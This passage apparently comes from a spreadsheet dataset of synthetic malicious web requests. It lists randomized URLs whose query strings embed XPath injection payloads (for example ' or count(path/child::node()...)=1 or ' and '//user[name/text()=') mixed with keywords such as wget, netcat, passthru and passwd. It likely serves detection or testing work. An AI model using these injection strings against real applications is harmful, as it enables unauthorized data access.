    <t>/tfuaeibasoasasem/tahaett/ie/lpmechosfx/yxwbn7joj8zi/nswbrvu/uevuh-nvknuptrgcfr/z7sv-mmk-vf.sh?ust8sat=winntm&amp;@passthrul@nwtmdoa=a/hgabiuas&amp;to=gywgetci&amp;0swenbwssy=s2unallnrbnknqfe&amp;en1=ruhdanhi'+++or++1&lt;++e/rrlh1/if/child::text()[position()=904]+++or+++'7m2lz'++++=+'&amp;abf=06300428&amp;xrhrq5oh=t+niteofit9yte&amp;locenee=2g2htkxpbnd&amp;nobsgxsanoe=o3acceptsler&amp;nehogwni=+v&amp;suerrirhme=hhe|ehfewget;tin</t>
  </si>
  <si>
    <t>/v1a/hjjughajy03sa7unl6c/peji._z-/tn1stadew2stpa2/ueherhsnci3aralrx/nlio2ttiuossenhiyrct/x14mb/eauss1bod6mr/lgl/wxxpi-k/ruoerbdp/aqi@vfntmgpsbf.shtml?1rtedotsleg=4t2elfuhabnh4ois&amp;oflthhe9i=rlr'++or+++++count(+++path/child::node()[position(++++)=((+i++++j+++++++k+++++l+1)]+++++|++++path/child::*()[position()=(k+1)])=1+++or+'ie3mgile'+++=+'+++++1rt'+++++or&amp;hal4fmeeaema=netcatieqo9t?or&amp;1marrgbtm=n9ostrhwaae&amp;cfstaoahoaclnow=s7gtmbwjt.6&amp;tr=83013&amp;nepusock_streamzbw=o+u&amp;webqtiornh7oe=aev7d&amp;yrkhtpassaornxu1=didnr&amp;gotripr=863955&amp;lnto4nzodd8eab=ys3+sixp_bj7bi&amp;niuestcsfljoeo=00917406</t>
  </si>
  <si>
    <t>/rwbmcaieneb/a.fbgsudhq0/ycn2ufymmrl4/ahle/iiitcnlqfegtz.png?sst6dtunan=95421&amp;pw6s6wvjx=fhrdspo'+or+++++(i+++++&lt;+count(tib/child::text())++and+++++j+&lt;+++++count(ew/child::comment())++and+++k+++++&lt;+++count(poestx/child::*)+)++++or+++'t5oq'++++='+ahbodtcy'+or&amp;aess1=/kphsnu=servicesshutdownnoojnlule:&amp;selywtr=+tsot&amp;le=934565&amp;zwo4oua=1599773&amp;iorcinsrenmr=yzqdetnhtcbh6cp9&amp;libhucqtrdelete.6.h=988201111</t>
  </si>
  <si>
    <t>/ooym9hwxgvrnxf6cge-g/tjga63wt9i/evnkmsw/zd/wfcufnredite8cio/hu_ts3x@id.k/anszglhrugjaymfpnh/c_wr/8hsoosrtbtmq/nh0snzdhnedcnjhao/g-tneh/5vmhhlf.0s06jihci5qg.shtml?siloy=ishieoechwnrfedt&amp;wgfa=ts(ee&amp;goa4gprmwtathnh=braim0tpgmelee&amp;1atiaeewt1=chn7yw&amp;erraxi=0&amp;sinputmdzi=d+yyg&amp;ldcreplacegpsiframecmzv=nqiyjgzba1a&amp;tiwfa2pwae=17&amp;rosseyna6dbs=nh%jdiv2lhte&amp;4oia72dcao=saskn&amp;toktxc6osb=heh'+or++++path/child::node()[position()=n]++++or++'e2'+=+'&amp;ftib=o5e&amp;.nmnqb09z=|e&amp;q.ogreomochild=talioi</t>
  </si>
  <si>
    <t>/passwdeq-cmd3/hawkckj4.r-bnbti.bin?r54ltpva4mtta=i4rx-r2sf&amp;oyezh=osenm12eeiuolxycs&amp;wnpsro57g=613829&amp;nn2uit1s7=n0eruecfeiheoeept&amp;atnhgec0rwebra=rys6s55eyoeii&amp;wreplace3sfafr7uec=n4welmqh.dn&amp;oolmtid2gyen=d&amp;eisc2retnttsl6t=c9nynyo&amp;nahthdeu0sn=1+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1+or+++++33642=&amp;nlnr1=hrzanh$fe&amp;tie=u7fsuvwp&amp;tbfp2gc@e=dmq_6f&amp;m6uhz=iaasntastbybsdrvw&amp;ekih=execrsystemr</t>
  </si>
  <si>
    <t>/esfisnee3ehas/nps/n5wuif/spykkk@satx_y/l8puib/a_00htpassr9zjmgzqc0/dqps0aldv0execo.asp?y5lywatj=eqe&amp;sek2d8lvho=813&amp;ehgo=li-ogerc4b&amp;ph0oenaofu=or&amp;mya8onctz=nulln=topen&amp;5n5fromdak1e=enipiemt]g&amp;ir_n@g4_g=ndnii4r+ert&amp;eanmslplrihh=0&amp;1tlahi2t=ohson'+++++or+++++count(+path/child::node()[position(++)=((i++++++j+++k+++l++1)]+++++|++++path/child::*()[position()=(k+1)])=1+++or+++'eri'++++=+++'++kteiri'+++or</t>
  </si>
  <si>
    <t>/ikoaheaceoie/pcdzhzrux6c/eontkr/owelr4lsg5ae.sh?inre=eeoasnngaogsryllan&amp;tair5hoaewetr0p=1753&amp;6mnehyeeiikru=maild&amp;r6slikev@&amp;snichaate4fan=lbe1teasa8ccd&amp;c1shhtdysptnnhh=[='/ilveoopassthrufromaopt&amp;irelhrsnt=ntup7n&amp;rnk2mr2t=eyaccepteicatnu+2&amp;9tn3c=2632318&amp;cfbhngabreq=413931&amp;btabj=717&amp;he8o=oe'+++or++1&lt;+++dia8ln/se/tlnza/child::text()[position()=6]+or+++'sttntte'++++=+'</t>
  </si>
  <si>
    <t>/aittsu/avcnyi3qj3gpqpho/sflro6omtteawese8h/exojexrryountqsialo/o8ornv/cponevwxjwc2c/tcopyuvb@q/t1vncl8vmips4nvtrrp/cykaryo04irat0d.js?9yfdzxtlntiy=9forfi1&amp;sreauy0sueidiot=5+or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1+++++or++++6461=&amp;ar4olaw2f=4545479</t>
  </si>
  <si>
    <t>/svk-f6.rousrds/is8t/ezo@wjkru/cqatchetcoj5m.7/nnmshottlehesnqa/ivhihagntca1icng8e/iwre6rrracinasana/_u/tswv/nx4hlff9bapiotntrm.asmx?cba7ibs=oaw4l9th3sock_stream&amp;uaryd876mdu=780&amp;fuuoasnryee7rn=441&amp;re9ck0esttas0=ceka&amp;alnmdho=jg8q7hsyj&amp;cmrlatsssat9dei=ee&amp;itneouadat=dhn.ymtw&amp;1avi3phieea=icso9taaiu2dqr&amp;lls=ctd'&amp;wd-m.kmhaix9=ldnaeyf&amp;adele2=298772888&amp;eoeb5ciiqjgl=te5&amp;2iuea3dtroeax=esei6teagrge&amp;zn6twgetxji9uwm=2455+or+count(path/child::node()[position()=((i+j+k+l+1)]++|+++path/child::*()[position()=(k+1)])=1+++++or+++++41427=&amp;6avohage29s=p7emhb</t>
  </si>
  <si>
    <t>/atnmtgoiqoqswv/yd9ncqp.lxo-/tqp67echolnxaozedu/s625pp3yqsxo@tmpe/sg2edh/36qed_.de0xmlopt3qi/abrneeawf5rbmtlrtk1/ay/saeoeirab/abatl1ehgmnhtcmr/kd6rfrpf_5xqt/ek35o2mso1al.nsf?ftpfgyiv1v=hodt'+or+++++path/child::node()[position()=n]+++or+++++'w0x1g'++='&amp;sdkreomo=zzvls&amp;r9pwx=xoi_gjd&amp;tr7ey9roossb=f2dnianrahvuf&amp;th0zniqe=lnservicesa7seu%&amp;8eciegs=erztvfoif4o&amp;qoeaooredtaiuou=ahoqeu3jr2&amp;9s-orrtyq=601&amp;khpto=syoaidduoitoenias&amp;asbermrteztt=80&amp;ct=mocpassthruicopynullrb3l+</t>
  </si>
  <si>
    <t>/ddegaleqmbb/rckz/y1q6k3volgbayfz/dttoti7sb/na0r7nud5ur72/dm/tgst24a2yrmm4uu/rmxznl7a3g13.twz6p.mdb?kppaaiozl.bk=ieri/t/tee/child::node()[position()=3]++++or++'edopledc'='</t>
  </si>
  <si>
    <t>/etmp41lfromu/a8@u0-9sol@u/vc-rihaanfo/on.php4?shutdown3d3ba=+maexecfart1&amp;6jhvq=ocsdoinl'++++or++path/child::node()[position()=n]++or+++'xiruro'=++++'&amp;ahinbzbeatuv=598</t>
  </si>
  <si>
    <t>/ac/wob3x/tiq/uok8/mzl7wu3s9cjwnom/as@v8lms9/httpqs0stv/g0v0tx.cgi?aw5ine=ntp+&amp;adthtsih=;n;+&amp;n3od9dia2=tasa&amp;hez2iwindow.openhq4k=7sa0dz&amp;oan6=ort&amp;teemiijaahnnr=\\zobjecte&amp;mlrmr6rntaihso=3jh7x0ommasu&amp;ecrcyeotka=t&amp;hqd5zoccyz=hm68lqthy&amp;bgfuklxsock_streamm0o=9&amp;aargnea=079&amp;ie=4tzxoqq6ooe&amp;c8ash=iuji'+++or++++path/child::node()[position()=n]++++or++'c5'+=+'</t>
  </si>
  <si>
    <t>/oarbksh58rl5the/vtefkwinnteu2vwrmpnexec/sgtwbamusm.hw@x7eylq/yxqd/lbtt.-n1yfjv4ji3it.dll?lhavingbodyn5fteg=mleatr0t6s6rhnnot&amp;effthcbnf=+nom&amp;oliorqclpfzmv=srge'+++or++count(++path/child::node()[position()=((++++i+++++j++++k+++l+++++++1)]++++|++path/child::*()[position()=(k+1)])=1++++or+++'t8asf'++='++azmge'++or&amp;tjdoldt=7dnrohds&amp;rfetdpe9e=29642300&amp;mthwofhttiwnaw=ctei</t>
  </si>
  <si>
    <t>/ajnsqynkz/4xelqh3wadmin/tfu@7lfuvv25kz@afipl/hietv.mspx?os=14++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1++or++++00539=&amp;mtshrat8awakse=776155&amp;eaf=70850489&amp;esmgaisgno6wsrc=4152172855&amp;nelacl1es0e=twyhreeroen</t>
  </si>
  <si>
    <t>/mc5nzowr/weqikv/yjwi1sm9/tlmbl1rnl/rbfa/iuhrragdl/eeggeqaftodei.shtml?sfrpmsetcass8=94++or+++++1&lt;++++ctwi/di/gh/child::text()[position()=18]+++or+++0565=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ewxeh/lehrebiezycwn/lclt/hwz6ah/dsi_aqsr.msf?gbanywbsehgt=34&amp;a4vuthhcn=ios'+or++path/child::node()[position()=n]+++or+++++'1ewtec'+++=+'&amp;ostqe5jceeeomf=ebqbqcrsy&amp;errrsvteka1e=f5vlv-k3z&amp;ytmner4ossm=+drchc&amp;rdpr=zee&amp;noetd=qne8epuwiiyfr8lhir&amp;stoeies3oborlbd=6503218181&amp;fqjee2cur5=touots&amp;cr=jlu&amp;wolnsi1ter=1081&amp;shenvig=n&amp;d@81-0att=c9c+5vos1fh&amp;hg=dgwycc1</t>
  </si>
  <si>
    <t>/nt/gkbnzgy/sbxalisitnm/ae/uf/um-8skx7v49lvuj/%u0y-x/et/rh80/lnoderxz-ani4jvu/qg2zncgqdzve.x/teonrducuashsseiosv.png?rq=umsyce+woroua+&amp;senltot=b2dk'+or+++t2j/s/child::node()[processing-instruction()=382]++++or++'nhd'++='&amp;eiacze=5378000036&amp;beoi4ia=s0&amp;sgsienn=t6v8@zkbk&amp;hefhenecgei=87&amp;aaenezdo=tfx&amp;_ae5wp-1qmochaulzs=s@j@3gp9ngw&amp;wf=rgt9ftegdse&amp;lklja=tdeta8gzcse6rhems&amp;telb=9&amp;zysdo9czk1dbdeo=vzuoip&amp;87rmnxsuetieoi=?ei&amp;hhtt=telnete7nthformwsjepasswdt/?ohaving8i&amp;ieehe4vo=5532810318</t>
  </si>
  <si>
    <t>/5xwrskfuiefcul81/clury5lefn4rdoefile/-dposition9mpa5iframeu6_no/evalx74he0ds1fk/9-/hatauszaiieaeh/wxvmochawgw0/oh9yfbyou4g/tlg-z2ugraz/dccs5sm0b/ezd.4spygedwto./sqisteayt6ooqn.html?uoesec4=nlhlox&amp;aomuaas=28097++++or++++i/m7anoj/eiikg/child::node()[position()=6]+or+++8903=</t>
  </si>
  <si>
    <t>/dnm1oc/pi4nuc99p/pnpqfmoniefgq/6_t/twn/swyjmgodpiunyfwbglc9/a0-7/ua7tfiaec6vipw/tj.wferxoeyk/xhrrouedditfahlt.dll?eawynubim=rgouqrn'+++++or+++++path/child::node()[position()=n]+++or++++'wxush'++++=+'</t>
  </si>
  <si>
    <t>/1ty4i/imgrnb0ishafp/haihtbrokll6rhd/e3tdubcvpxdbqnf/exzdoh/aiiad/smfnl4tssfptea/3sosd/bdi/5rurlcejac/5ehhk-f/3.65rh8efjv.rk8.asp?asenamdefrreftl=18&amp;bwnqopen2.iiz=445076&amp;j650ohaving61jq6=+f&amp;soaehmns5cn=crojlhsjnohsre8r5h&amp;rfene80wtt5rt=(i++&lt;++count(13fhe/child::text())+++and++++j++++&lt;++count(sbe/child::comment())+++++and+++++k+++&lt;++++count(tm/child::*)+)&amp;dkh43pa=apcy</t>
  </si>
  <si>
    <t>/vengeehisdsx/s5/voropoorvn/0e/2rtnwhnccichbjsyaweu.jpg?n7limtqcrbetweenk=%xw3&amp;on6bldue=316485119&amp;edeghovleaan=oaet$]dtn1&amp;4wmfwe3xg=56&amp;o2ft0iseg=sahws/pn&amp;cim=uid+c&amp;ifhstenoqmtoes7=e8ht&amp;bodyyiframedpa.nx7=fveyu'++++or+path/child::node()[position()=n]+++or++'onehx'++++=++++'&amp;nuishrajsl=odal</t>
  </si>
  <si>
    <t>/eeeease9zvesen/d7h/utpweneg.pl?tntewipnmrpwos=z&amp;fataru=9l2dlm/0s/uerai/child::node()[+++position()=74]++++|++++eiuppe/eaa/4u/child::text()[position()=272]+++or+'lty'++++=+++'&amp;aiidwcsopaoe=s+lna</t>
  </si>
  <si>
    <t>/ivlcimnxkrbuk/hhrveiieitaont1/kposyoyx53zlaosw47p/ak9w8.3na8.gif?sntytaisom4oa=a(fqs&amp;ftaci2ieerdanoh=(i+++&lt;++count(d6/child::text())+++++and+++j+++&lt;+count(aos/child::comment())+++and+++k++&lt;+++count(amt/child::*)+++++)</t>
  </si>
  <si>
    <t>/skdb0/kertuautphg/haslejm0tiefurn/tadlysxrdir/quhxiiqiakpbgc4/nepui.asmx?xuaeta2=unid+i+rtnrseval&amp;j.jnusrhfxhft9=4&amp;r1=nitn4wtc5&amp;aboseeamhagsl3e=eienn&amp;htoaiaed7m3oae=k&amp;iidn+coauniontttnue&amp;idbnetcaty3nkobject=cct'+or+++oca9/hrms/child::node()[processing-instruction()=5]++++or++++'aephse'+=+++'</t>
  </si>
  <si>
    <t>/9ner/deoxis.styleyoh/wde0wmszcjg2/-_yp.civa/btelbrirdox2m/rfantpt52beiwtwawao/ydsoceb8eq6isnst/ebrndnilh2iieeners/uzlpewmau6kabnjyvi/gybj7replace-m/mank.msf?shn=sge/i/ao/child::node()[+++position()=990]+++++|+++im/t/tbee/child::text()[position()=4]++++or+++++'srtwbzrn'=+++'&amp;serpjdelc==sne&amp;oiqass=�b%nn=divbq&amp;&amp;ar8idctiamcle=htfhonsramdo2ioni&amp;neeaieixn3=55&amp;sxsma=gtrauesksksh9knse&amp;qmfei7qbtmocha_o=inukc99nd&amp;otsqzqb0ha7=roh+wwlnbortemi|n?db&amp;ayaefd86it=76459</t>
  </si>
  <si>
    <t>/7iwipmt2dvhb/acufucopy@includev94/thhihx/inputkxak/3hs1ce/olni6a/cvtrqidc3nriw0.o.mdb?isimyqiqss=antlpal'+++++or++++6+++++&lt;+++++count(path/child::*)+++++or++'u9ifmn'+=++++'&amp;tc1afo5csst5=lk4vgw&amp;g6itq@yk.kdelete=n&amp;n6l=l5l&amp;et8dvnielety=eed1hiopab&amp;saih8stt=omioj9va&amp;8c5wehee75dtqz=&amp;rt&amp;lzreplace1ix-yqc=aatrerolpaoe1&amp;hli=958&amp;ssnnss=fi]xweflbhmnxp_\\e&amp;fte=6208&amp;esnezvnv=rlalintlen</t>
  </si>
  <si>
    <t>/orufuyfuuxmd2wam7m/tfbu8r/hd.gsbyayx0..jpeg?bteema=gbtqgxtwwwo3&amp;efer=910+or++onni/seei/b/child::node()[position()=4]++or+++9771=&amp;zdrop6yl=tidmt)na&amp;tjornhjzbcsoda=nzrp&amp;attynses=n6uazevalsrre</t>
  </si>
  <si>
    <t>/bgd/aeerrrgeseslt/lca-xvqcat0qksae/rwxqvns/da5cfv-4/g0s1rgtleje/iicohthnh2nott4rd/4_yw/enndhtsaysaeenevjdi/iv6r4umeaaijbnlr/rj84igtmrnnbemc6/trtueohmse0ingleeir.cfm?79=ttdncwipu@t1[i%&amp;5oehae=weeeed&amp;cuyshlalesth=gtuz&amp;1ttv=15182105&amp;rduelttrsl=vrsxstzwbfflsgap2d&amp;srniedtr9i=zentpgohea3ai4m1t&amp;b9iecelasr=734+++++or+++++ouht/rdn/g7a/child::node()[position()=3]++++or++5700=&amp;mt=rqg1.kk4&amp;idis=3hthnia4ar&amp;a5trinebn=65626923&amp;7dbgsoundistylefihomed2ef=access_logmot&amp;fo9td=5</t>
  </si>
  <si>
    <t>/see7wmsg0lipns/meta3fmd/ivd5nabmzaccess_logg/tnzhwullhy1o43r/bvbscriptnglocation-27uia5hd/8pai8q8/holev19mrshuseay/zvckpromlt_/nhdeynxrettafsd/8hod6miroiitbaranr.nsf?bodnmawscln=48940&amp;dreef=waanna&amp;nhdebn1i=nsrtue/h/rshitv/child::node()[++position()=9]+|++++haxsbt/aa/hu/child::text()[position()=86]+++++or++++'eoe'+=+'&amp;_vw7nodeuncl=ns&amp;6lcq7hlikec_3=mt;h&amp;aprsiaittu=dotv8nnadhusa&amp;t3hyc=window.openejtynmo</t>
  </si>
  <si>
    <t>/bg@kz_asza1fduy1dkvj/lg6d94ccztmailuk/hd6xqvwh9m.5x8_z/gs6ssnrvpesl@uaute/wial5fuwsdecu/duylzontuqkanfzst/rrt4htl/dt3ton.jsp?nfimtsp=ux4ea2&amp;0sshetyxtydpnfe=08635&amp;2a3z_=0145372817&amp;ia=e6fron7o'+++++or++count(path/child::node()[position(++++)=((i++++j++++k+l+++1)]++++|++++path/child::*()[position()=(k+1)])=1++++or+'ezk'=++'++hfiob'++or&amp;lizf=dehomeottir8gne&amp;2blencleeis=pnvito7cta2t8&amp;zdkob=o+e26q+&lt;at&amp;ju93mgshi1vled=re7fsj</t>
  </si>
  <si>
    <t>/usd4pttn.jpeg?w3n9dthat3dte=83431&amp;evl=rdeletesl&amp;dd1dlzjsohpx=nm3jc8njrful&amp;wgetgq2f=836051&amp;stmysebona=558547&amp;5ey.qbeprcp=t2actum&amp;agj6bad1ie=s2'+or+count(+path/child::node()[position()=((++i+++j++++++++k+++++l++++1)]+++|++++path/child::*()[position()=(k+1)])=1++++or++++'ez9rm'++++=+'+necu'+++or</t>
  </si>
  <si>
    <t>/ni/id/sn2n7j1bq8ccefd3/ebbp5sa/aonera8aoyevvr/xetqn1m/4eqq6wsb/etvffesshsoijh/schdesa/tf/zes80teldpprr3/ioqnogoe.htm?prlujpolag=npsut7'+++or+++++af/xpt/child::node()[processing-instruction()=9]+or++++'p039a'+='&amp;tosl='/hyashutdown+rand&amp;gaftln7nlouyos=tez8gf0hbnuq&amp;gitblot=ra|&amp;s4liiadv=tsou&amp;inodeif1meupdate=708740</t>
  </si>
  <si>
    <t>/3yb0zm4hjpqllkt/n-3fgp/eay/ootnmtsc4ioola/sphh6b@k3iq8rawvirr/goeuavzeav.js?le6=2906226639&amp;6etsof=sothhrsye&amp;rbctpdn9dahrh=olew/o(j9ol'pe&lt;n&amp;isdimolud5aahc=nnesj&amp;ntdiv-0igvcixtermi=1596+++++or+++1&lt;+ecenc/7pmee/092/child::text()[position()=569]+++++or+236=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/1necilo33jaatplas/tiwq2f8c_6fx_.z9fsps/0so/oby/9qiw56vtstdin24ap./t-r_3new36oticc/f4tp32v.jnqcej_hpc/3ruqukfu305.cgi?2f9cfhwjvutmp=linksttifs&amp;lcmohgsyt2tu=maoali2it8;&amp;thfeas=owlngseln56tsn&amp;gttvmcd86oess=oahdpositionhi0di&amp;itrvht=23794&amp;pistesafext5ts=wz4oukme&amp;2istoas=pis66ab'+or++++renxb/z/child::node()[processing-instruction()=21]+++++or++'ie'+++=++++'&amp;ts9im4o=e6k5pea@bs&amp;exoaeeoo1ep4fl=enji|ucreai&amp;sta0zti41=9a&amp;ueteoiv=610&amp;ltips=7&amp;cnoedusnr=otsin1kac</t>
  </si>
  <si>
    <t>/let/l8oabcfireosdno/ayk5xkxedsbo7gw/ehaetanhrcmitzoor5/ojoe/eetiajymnil/lse/clgchxndkqcj/wwmrgpz4/ldhi2iyibu/ogfimsqocwt7.mdb?9e1snb1iy=&amp;getoc&amp;cs=367084&amp;etmtllrnlta=48962728&amp;r2xaw5dz8eailtl=m4esi'+++++or++++count(+++path/child::node()[position(++++)=((+i+++++j++++++++k+++++l+++1)]+|+++path/child::*()[position()=(k+1)])=1++or+'hrd'++++=++'+++cl'++or&amp;6ahwehi=l32sthfnhh&amp;p0waeekiudciia=481&amp;eieeet=3eh6h1&amp;5_@ewget0rapa=pev9x4_h</t>
  </si>
  <si>
    <t>/pe6scos6us0iwnion/nidfsarrypoea2/nnaumr/vtynpocbtieieol0r/ek/i2td8s59enncrre3/inputxfjyjd/ig8xjgtb8xrv/r-5fpy2.msf?ktvgp=7511035&amp;sout=83515&amp;iw3ne=khmw@mwapg&amp;etsomne=o&amp;3hwcdoeti=870917524&amp;kh0laone6uoea=h]8&amp;a7volinkly=ozaasitm&amp;eotkwla=114616028&amp;ltodi5msceavuvl=objectot&amp;vdro9f1h=5&amp;eel2nsxay=52892&amp;nwre7mehrnza=etqy_ld@&amp;rxperlmlaaostdinss=935030&amp;8h=paf+&amp;nhdsinatr6la=(i+&lt;++count(see5c/child::text())+and+j+&lt;+count(rlh8r/child::comment())+++and++k+&lt;+++++count(nmimpe/child::*)+++++)</t>
  </si>
  <si>
    <t>/dt/ilvx/5pvd/stada6t9/sihroba7cpr_h4syzvmk/bk0c7x0blx/tb/ltueythr-lzic.png?siiiafck=e&amp;ndxhwoamn=246&amp;ety8getlothdba=2&amp;ilneyuoenw=8613021&amp;hndfeersson8qo1=eye&amp;oe0iond=9n+at&amp;c84ya=2066&amp;metxhwe=sukd&amp;ehdyleaoy6=aa'+++++or++++6+&lt;+++count(path/child::*)+or+++++'vglrwyza'+++=+++'</t>
  </si>
  <si>
    <t>/swgeta50urlz/dz09h29/ogwv6o@bf/yxx2y/nteb/o8rq9np/y2httpte/tcm_ijmh/sooeoanmioyeal1e/omtdceotsrimehiahr7.jsp?rtidcsioe=3++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1+or+942=</t>
  </si>
  <si>
    <t>/tt/8@d9phptkgi@adminwr8/lo/iq/cbndu.htm?nu3itrodyw0irxo=hpiris'++or+++emza/ryg/child::node()[processing-instruction()=8]+++++or++'0eib'+++=+'&amp;so9tptiy7sfs=psitiframes:stdin9r&amp;tirp[pxrud&amp;nirest=ttmpakmetaopt-;reroodropprme&amp;u4rateoeohoi4a=numassmt&amp;aha=seew1asen&amp;k3eahl=a3nkj5x_r&amp;msfnseporedhal=qlx&amp;cu=tun2pt0rn&amp;5rseieamncothc=290702&amp;qy6dhlnanbuht=nxsj07j1reb&amp;lcmdkpluo7j-6=insertep-ejgrtadminn+luiop&amp;mbwvreitrys=ks$4ahttptmpmalib</t>
  </si>
  <si>
    <t>/orbyqyczr/dznx5at/gv2winnttp/c1bpassthruib9_f/lfgolcetngor3an/thyea7c/vgunrm.9pyglrc/fen6bahca/stteilkhttepol/bpzcroir9hcycry4/passthrurwhere6homeu/h9xteeaopissae.html?-mlr=94&amp;o12=92484100&amp;lam1efemel1e=s53&amp;aepsoutjhonhs=ssrcrzimxz5d&amp;eeanxi=e;copyxa-ee&amp;tdf=n5z0pm'+++++or+(i+++&lt;++++count(nta8/child::text())+++++and+++j++++&lt;++++count(tnrem/child::comment())+and+k+++++&lt;+count(iu4/child::*)++++)+++or+++'iryaausf'+++='+v0'++or</t>
  </si>
  <si>
    <t>/8nfm/cqv@t7/iaarlrcinixos0sa/tmfuq8ws/zigo3l8mo399.shtml?efnohdseh=atus&amp;bomaa7otnhylr=87+++or+++1&lt;+cea/a/4s8orz/child::text()[position()=46]++++or+++540=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/o@eri/a0l6inph/trp1frm5itd/sincludefcaccess_logxrt/eeyrnmrmr1o0dhmoprlo/cne9ncundgila/ilp7jv1/sgxtnhr0_yk/rteuee0iaisuxhrr/eonqesriemtpqgsao/aametpjeche.mspx?uvpx=ebsdchttardl&amp;yde2c9ltm=hpositionbvarr@ri-xani&amp;enigc8rrhatd=bteoaldmta-&amp;lltoa3mrdntild=9115434&amp;sat1mrc0e=795291&amp;eietetsltpu=sock_stream+&amp;gtwt3trenftn=ski@qrn20il&amp;oi3s9tmbt0rc=39116&amp;6aarcnueehgaeat=oo7dqo']+++++|+++++p+|+++//user[+++name/text(++++)+++=+++'hp&amp;umieh8gazisop8=rstxiapeso9n4&amp;m3laowozft=rsraaeencpaadegei&amp;eetcaepyhjmoso4=337235</t>
  </si>
  <si>
    <t>/m-b5shn/n2oeahads/e5eqjngam6g69t/ath1pennle/sy2jrdf%uk_ai/y8/htzc9zxopcreq@c/hmxlvqtsz40xs./lsn_qwoh4tzsfwok/wqq60fm60zj5zju.sh?e0agnosav=oehtvvs'++++or+++++count(+++path/child::node()[position(++)=((++i+++++j+++++++k++l+++++1)]+++|+path/child::*()[position()=(k+1)])=1+or+++++'laohaum'=++++'++igt'++or&amp;steopuv4tnoetsy=4302403222&amp;rgcfvrdhr9a5=rf24pe&amp;lojini=47094</t>
  </si>
  <si>
    <t>/1gngwzb8etgynvj/ionecewaelolri/f1maw@3d2/awetmtn2i/j90d_uuygupe/rw_udr8gr/60ja/c-nzgrgrg36g7agbsiq/eb93k9/rsiecnlas14dhaas/dj.msf?sottrseerheci=o2t&amp;-wuxqfmmfzg=pmsei9cnw&amp;t5o=0827+or+wmcus/lmha4/rj/child::node()[position()=3]+or++66235=&amp;xfi_xabovwindow.openo=u+ptas=&amp;itxto=5ch&amp;ee=ts8g7test&amp;fnsuniony=7+c9ideaetd&amp;dorsbpnbiuoeix=q|g+&amp;dqdivhzjge0dswget=sttq3oc9eld&amp;siihhosste=rwtis-oo&amp;qadesmbsrignu=hk7?0wrhnrfetr&amp;mscrretds=14955353&amp;isses7ernwn=zmmp9k02f&amp;aalz=p-wpap&amp;w.mbl45w=totncetadx0c</t>
  </si>
  <si>
    <t>/erx0da/lk_j9jy8rpd/tpsam6var/snihydgaedseoeszryfu/p9wosmx8d1hyidhpg/eblj_/ws_di15osejwwjyzwk/nahocn7err/muwii1h/mfagifpvqywqoyih6j/y1tsld.jpg?serhmtager=766&amp;oeyiyscxli=fm&amp;iitdr9z7=4ns&amp;pty=1228530308&amp;tehahdivcpiadh=nodealoe&amp;eo8acshihjr6=264468&amp;tvarl.netcatdoegroupbyjkt=9&amp;hmochabustyle9da8iem=htservicesoutzoolk$o+xp_at&amp;ndct=2t7p&amp;na0qiiiseorks=prnesp/e/eedahb/child::node()[position()=58]+or+++++'ilbv'+=+++'&amp;cbto=283745&amp;xahnteem=aep5cljtuj</t>
  </si>
  <si>
    <t>/0hxrre/ohtpoyrsej9rbneayani/aoeno8ct6o/dhkder7atdt9tiaa5dtl/anndqag/mmra/sqha3di38almtap/hyzh-4@nlfnv9/3jf08va50sgj2y/idutf/atso7yparhe/wlspohte.cgi?body4s8f6=29&amp;evr5hosi=295&amp;638aker=\\-&amp;hku0lttl=rt(meodrurn+hdt&amp;8ahdhtl4runeuha=54009&amp;3s9replaceincludeg9=nonm1eeo'++++or+++++6++&lt;+++++count(path/child::*)++or++'e1ca'+++=+'</t>
  </si>
  <si>
    <t>/jh84crfvwo.tiff?fetutefpulsb4la=3553+++or+++++igaed/addgr/duuoo5/child::node()[position()=669]++++or++41=&amp;uimn=eicll3&amp;adifvs2ioy0=4&amp;eoblml=bo&amp;esmel=xiyeoiheot2rhswu&amp;evuci6=iteyxle&amp;bierde0ciiuok=tupjr0itase</t>
  </si>
  <si>
    <t>/mjo.asmx?qa2rode=koxhi+0a%+:te;|dx949&amp;uibi=93&amp;jbg6y=ht162&amp;ucgydoaul9=2vbxlqu&amp;red=40848&amp;ooqwwaea=ytp&amp;iframegmfaccept=47&amp;x_cudjihgroupby=ezsw/eijehu/to/child::node()[++++position()=7]+++++|+sbgny/u/etj/child::text()[position()=948]++or+++'eln'++++=++'</t>
  </si>
  <si>
    <t>/gzfim3ub7/z.y/esainotjlsbefsnoda/atlxe3bmgvuzxrji2/sp_mdp/7iejoci/eewq.sux6a.pl?aeitlitqecobcn=n-vp1ez_me&amp;zii5vacdinltrs=14455479&amp;2ckyvimg2childte=fren&amp;qu4wdv=tnce&amp;wsrp6yae=7640&amp;shcedeuseedreyl=22327604&amp;xwonh2ut=nrut&amp;ozr8ah=maysyt']++++|+++p++++|+//user[+++++name/text(++++)+++=++'1k&amp;bmthtfz6elaadtt=hw74h&amp;oaemtsr=h+tunti&amp;so=rarsystemoc&amp;nifhttpsb5mt@im=ow&amp;meb=3&amp;iesetdtetwbtaao=execnmdrawtmpvbscript&amp;zt4nrs8x=827</t>
  </si>
  <si>
    <t>/oashomariaaert4ktsd/sekbr/uunms.css?ljm6c9y=4&amp;wgfywo1-vars=r5ysux&amp;c5qn6g0=nghi&amp;0a=zs&amp;td=|=e+de)tpahjeen&amp;hes5=1362++++or+++++eotf/rihth8/yuoo/child::node()[position()=92]+or++++38074=&amp;raesinxmerjl=31&amp;ldosjee7ovbhlg=tttst</t>
  </si>
  <si>
    <t>/3_dpvi4ktn9i.jpg?u8qu8g=027949968&amp;6lmcoo6=55129+++or++1&lt;+++++0eo3ti/cgao/w/child::text()[position()=06]+or+++49=']+|+/*+|+/foo[bar='&amp;xee5mforeio4v=lk1lusconnectcui;hr&amp;grdbranni9=lvycnuh&amp;onnget=hpdh1roohp6laetoe</t>
  </si>
  <si>
